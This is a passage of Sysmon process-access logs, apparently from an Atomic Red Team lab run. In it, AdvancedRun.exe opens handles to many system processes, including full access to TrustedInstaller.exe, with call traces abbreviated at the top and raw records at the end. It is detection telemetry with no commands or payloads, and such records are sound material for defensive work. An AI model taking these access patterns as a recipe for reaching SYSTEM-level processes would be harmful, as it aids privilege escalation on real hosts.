A  = C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
A' = C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
B  = C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)
S1 = C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
S2 = C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

RecordNumber (header precedes this span)
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F46C-61EA-8104-000000002702} PID 2464 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3984003
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F419-61EA-6A04-000000002702} PID 4528 C:\Windows\servicing\TrustedInstaller.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3984002
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F392-61EA-4B04-000000002702} PID 948 C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3984001
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F392-61EA-4A04-000000002702} PID 5408 C:\Program Files\Internet Explorer\iexplore.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3984000
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-E497-61EA-F401-000000002702} PID 2136 C:\Windows\system32\conhost.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983999
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-E497-61EA-F301-000000002702} PID 944 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983998
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-E491-61EA-F201-000000002702} PID 3896 C:\Program Files\Notepad++\notepad++.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983997
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB6F-61EA-B100-000000002702} PID 2348 C:\Windows\System32\msdtc.exe  TargetUser NT AUTHORITY\NETWORK SERVICE
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983996
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB13-61EA-9A00-000000002702} PID 5612 C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983995
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB12-61EA-9900-000000002702} PID 5508 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983994
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB12-61EA-9700-000000002702} PID 5364 C:\Windows\Sysmon64.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983993
  Source: {834264DD-DAE7-61EA-1700-000000002702} PID 1300 TID 2268 C:\Windows\System32\svchost.exe  SourceUser NT AUTHORITY\SYSTEM
  Target: {834264DD-F46C-61EA-8104-000000002702} PID 2464 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1400  CallTrace S1

RecordNumber 3983992
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB11-61EA-9500-000000002702} PID 428 C:\Windows\Explorer.EXE  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983991
  Source: {834264DD-DAE7-61EA-1700-000000002702} PID 1300 TID 2268 C:\Windows\System32\svchost.exe  SourceUser NT AUTHORITY\SYSTEM
  Target: {834264DD-F46C-61EA-8104-000000002702} PID 2464 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x14c0  CallTrace S2

RecordNumber 3983990
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB10-61EA-9000-000000002702} PID 3336 C:\Windows\System32\taskhostw.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983989
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB10-61EA-8F00-000000002702} PID 4948 C:\Windows\system32\svchost.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983988
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB10-61EA-8E00-000000002702} PID 4912 C:\Windows\System32\sihost.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983987
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB10-61EA-8D00-000000002702} PID 4820 C:\Windows\System32\RuntimeBroker.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983986
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB10-61EA-8C00-000000002702} PID 4808 C:\Windows\System32\rdpclip.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983985
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB07-61EA-8800-000000002702} PID 4836 C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983984
  Source: {834264DD-F46C-61EA-8104-000000002702} PID 2464 TID 5148 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F419-61EA-6A04-000000002702} PID 4528 C:\Windows\servicing\TrustedInstaller.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1fffff  CallTrace B

RecordNumber 3983982
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DB00-61EA-7F00-000000002702} PID 4768 C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983981
  Source: {834264DD-F46C-61EA-8104-000000002702} PID 2464 TID 5148 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F46C-61EA-8204-000000002702} PID 2220 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  TargetUser ATTACKRANGE\Administrator
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983980
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DAF8-61EA-6100-000000002702} PID 4392 C:\Windows\system32\dwm.exe  TargetUser Window Manager\DWM-2
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983979
  Source: {834264DD-F46C-61EA-8104-000000002702} PID 2464 TID 5148 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F419-61EA-6A04-000000002702} PID 4528 C:\Windows\servicing\TrustedInstaller.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983978
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DAF8-61EA-5C00-000000002702} PID 4148 C:\Windows\system32\winlogon.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983977
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DAF8-61EA-5B00-000000002702} PID 4100 C:\Windows\system32\csrss.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1000  CallTrace A'

RecordNumber 3983976
  Source: {834264DD-F46C-61EA-8204-000000002702} PID 2220 TID 3244 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-DAF8-61EA-5500-000000002702} PID 4052 C:\Windows\system32\conhost.exe  TargetUser NT AUTHORITY\SYSTEM
  GrantedAccess 0x1410  CallTrace A

RecordNumber 3983975
  Source: {834264DD-F46C-61EA-8104-000000002702} PID 2464 TID 5148 C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe  SourceUser ATTACKRANGE\Administrator
  Target: {834264DD-F392-61EA-4B04-000000002702} PID 948 C:\Program Files (x86)\Internet (record cut off here in the source)
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\Administrat